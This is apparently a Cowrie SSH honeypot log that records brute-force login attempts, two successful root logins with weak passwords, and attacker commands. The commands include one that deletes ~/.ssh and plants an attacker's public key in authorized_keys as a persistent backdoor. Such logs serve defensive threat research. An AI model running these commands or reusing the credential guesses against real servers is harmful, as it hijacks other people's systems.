{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:56.893255Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.session.closed","duration":"16.1","message":"Connection lost after 16.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:56.939131Z","src_ip":"212.227.125.160","session":"3db21e26cecb"}
{"eventid":"cowrie.login.failed","username":"tanulo","password":"tanulo","message":"login attempt [tanulo/tanulo] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:57.150923Z","src_ip":"212.227.235.229","session":"c8b9493079ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:07:57.910985Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:07:57.911827Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.189266Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.190253Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.409205Z","src_ip":"212.227.235.229","session":"c8b9493079ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27984,"dst_ip":"1.2.3.4","dst_port":22,"session":"f97ea1a5e44c","protocol":"ssh","message":"New connection: 212.227.235.229:27984 (1.2.3.4:22) [session: f97ea1a5e44c]","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.455671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.459942Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58720,"dst_ip":"1.2.3.4","dst_port":22,"session":"339cd8508ee5","protocol":"ssh","message":"New connection: 212.227.235.229:58720 (1.2.3.4:22) [session: 339cd8508ee5]","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.538008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.539099Z","src_ip":"212.227.235.229","session":"339cd8508ee5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.589139Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:07:58.861629Z","src_ip":"212.227.235.229","session":"339cd8508ee5"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc","message":"login attempt [abc/abc] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:59.150604Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:00.191024Z","src_ip":"212.227.235.229","session":"339cd8508ee5"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc123","message":"login attempt [abc/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:00.280329Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abcd123","message":"login attempt [abc/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:01.410041Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:01.516954Z","src_ip":"212.227.235.229","session":"339cd8508ee5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59728,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3479665c22","protocol":"ssh","message":"New connection: 212.227.235.229:59728 (1.2.3.4:22) [session: 4f3479665c22]","sensor":"my-vps","timestamp":"2025-08-31T06:08:01.776126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:01.777083Z","src_ip":"212.227.235.229","session":"4f3479665c22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:02.063133Z","src_ip":"212.227.235.229","session":"4f3479665c22"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abcd1234","message":"login attempt [abc/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:02.541970Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":45054,"dst_ip":"1.2.3.4","dst_port":22,"session":"770465e4a455","protocol":"ssh","message":"New connection: 43.159.36.188:45054 (1.2.3.4:22) [session: 770465e4a455]","sensor":"my-vps","timestamp":"2025-08-31T06:08:02.634919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:02.635839Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58392,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d883e7faa73","protocol":"ssh","message":"New connection: 212.227.235.229:58392 (1.2.3.4:22) [session: 5d883e7faa73]","sensor":"my-vps","timestamp":"2025-08-31T06:08:02.722436Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:02.898503Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:03.230868Z","src_ip":"212.227.235.229","session":"4f3479665c22"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:03.507918Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:03.513021Z","src_ip":"212.227.235.229","session":"4f3479665c22"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc1234","message":"login attempt [abc/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:03.671350Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:03.989275Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:08:04.542278Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:08:04.543229Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:08:04.544591Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:04.801208Z","src_ip":"212.227.235.229","session":"f97ea1a5e44c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:04.808031Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:08:05.396287Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:08:05.396986Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:08:05.661806Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:05.662738Z","src_ip":"43.159.36.188","session":"770465e4a455"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:05.701310Z","src_ip":"212.227.235.229","session":"5d883e7faa73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:08:05.719540Z","src_ip":"212.227.235.229","session":"5d883e7faa73"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":43962,"dst_ip":"1.2.3.4","dst_port":22,"session":"ede6e8d66dc6","protocol":"ssh","message":"New connection: 43.159.36.188:43962 (1.2.3.4:22) [session: ede6e8d66dc6]","sensor":"my-vps","timestamp":"2025-08-31T06:08:05.913199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:05.914206Z","src_ip":"43.159.36.188","session":"ede6e8d66dc6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:06.166563Z","src_ip":"43.159.36.188","session":"ede6e8d66dc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54950,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2c60c976a41","protocol":"ssh","message":"New connection: 212.227.235.229:54950 (1.2.3.4:22) [session: f2c60c976a41]","sensor":"my-vps","timestamp":"2025-08-31T06:08:06.921830Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:07.217616Z","src_ip":"43.159.36.188","session":"ede6e8d66dc6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:07.657901Z","src_ip":"212.227.235.229","session":"f2c60c976a41"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:08:07.658853Z","src_ip":"212.227.235.229","session":"f2c60c976a41"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:08.471683Z","src_ip":"43.159.36.188","session":"ede6e8d66dc6"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":43976,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b6b80e7f206","protocol":"ssh","message":"New connection: 43.159.36.188:43976 (1.2.3.4:22) [session: 3b6b80e7f206]","sensor":"my-vps","timestamp":"2025-08-31T06:08:08.715271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:08.716238Z","src_ip":"43.159.36.188","session":"3b6b80e7f206"}
